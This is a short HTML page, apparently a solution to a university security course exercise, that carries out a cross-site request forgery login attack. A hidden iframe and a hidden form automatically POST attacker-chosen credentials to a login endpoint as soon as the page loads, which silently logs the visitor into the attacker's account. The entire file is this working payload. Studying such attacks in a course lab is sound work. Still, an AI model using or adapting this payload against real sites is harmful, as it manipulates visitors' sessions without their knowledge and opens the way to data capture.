<iframe style="display:none" name="csrf-frame"></iframe>
<form style="display:none;" method='POST' action='https://eecs388.org/project2/login?csrfdefense=0&xssdefense=4' target="csrf-frame" id="csrf-form">
  <input type='hidden' name='username' value='attacker'>
  <input type='hidden' name='password' value='l33th4x'>
  <input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
